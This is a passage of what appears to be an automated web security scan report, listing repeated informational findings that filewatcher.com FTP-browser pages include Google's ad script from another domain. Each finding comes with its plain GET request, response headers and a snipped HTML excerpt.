  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:28 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "z+lTU4+1M6v2pPjoHGrOuw"
Content-Length: 21941
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 486
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.862. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/Latest.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/Latest.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/Latest.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:28 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "BHT8fUvxr6sayQr/7dJ2XA"
Content-Length: 20191
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 485
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.863. http://www.filewatcher.com/b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/news.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/news.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.internat.freebsd.org/pub/FreeBSD/ports/i386/packages-7.1-release/news.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:27 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "MVHw/LqATGmDO6dC5DDb5w"
Content-Length: 20811
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:27 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 486
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.internat.freebsd.org/pub/Fre
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.864. http://www.filewatcher.com/b/ftp/ftp.kd85.com.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.kd85.com.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/8oT0IAJmn7Hqp6uXjAtfQ"
Content-Length: 4911
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 638
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/ - FTP Browser</tit
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.865. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.kd85.com/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/EkQlK1lrxpEnMbonF8cZQ"
Content-Length: 5916
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 630
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/ - FTP Browser<
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.866. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.kd85.com/pub/OpenBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:42 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "yjqPIrp84q6ixf79hIl4Hw"
Content-Length: 11022
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 638
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/ - FTP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.867. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/3.8.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.kd85.com/pub/OpenBSD/3.8.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/3.8.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8+pElFiXhwzzdHiIjV0PoQ"
Content-Length: 13604
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 639
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/3.8/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.868. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/3.8/packages.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.kd85.com/pub/OpenBSD/3.8/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/3.8/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "hTXXuCiXgqFim2lrW6ulng"
Content-Length: 9304
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 650
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/3.8/pac
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.869. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/3.8/packages/sparc64.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.kd85.com/pub/OpenBSD/3.8/packages/sparc64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/3.8/packages/sparc64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:45 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wT3dNJQ3CSAujL2FeS6U1g"
Content-Length: 34040
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 653
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/3.8/pac
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.870. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/3.9.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.kd85.com/pub/OpenBSD/3.9.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/3.9.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:46 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Kx2qKEpHHvNwKsUgJ5M/OQ"
Content-Length: 14818
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 650
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/3.9/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.871. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/3.9/packages.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.kd85.com/pub/OpenBSD/3.9/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/3.9/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:46 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "myQbMTp/SRumW2oDrRa4Qw"
Content-Length: 9304
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 659
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/3.9/pac
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.872. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/3.9/packages/vax.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.kd85.com/pub/OpenBSD/3.9/packages/vax.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/3.9/packages/vax.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:47 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "iv2kobMvJ17wHxVHzJbnyA"
Content-Length: 20042
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 659
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/3.9/pac
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.873. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/4.0.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.kd85.com/pub/OpenBSD/4.0.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/4.0.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:42 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "E3ef1lIQXTn9Big0YazmQA"
Content-Length: 15178
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 638
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/4.0/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.874. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/4.0/packages.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.kd85.com/pub/OpenBSD/4.0/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/4.0/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:43 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "zWRZALaeNzdBUORmsoTOjg"
Content-Length: 9304
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 635
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/4.0/pac
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.875. http://www.filewatcher.com/b/ftp/ftp.kd85.com/pub/OpenBSD/4.0/packages/sparc64.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.kd85.com/pub/OpenBSD/4.0/packages/sparc64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.kd85.com/pub/OpenBSD/4.0/packages/sparc64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:43 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "B6HUXtBWvDFetsyOA0b9ug"
Content-Length: 29378
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 638
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.kd85.com/pub/OpenBSD/4.0/pac
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.876. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nyc.openbsd.org.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:13 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "C/mTN9KWA8reI74M+yIqvA"
Content-Length: 6154
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 652
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/ - FTP Brows
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.877. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nyc.openbsd.org/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.nyc.openbsd.org/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:13 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "CBFSAOViI9xEC89NgJVG7w"
Content-Length: 5983
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 654
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.nyc.openbsd.org/pub/ - FTP B
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.878. http://www.filewatcher.com/b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.nyc.openbsd.org/pub/OpenBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

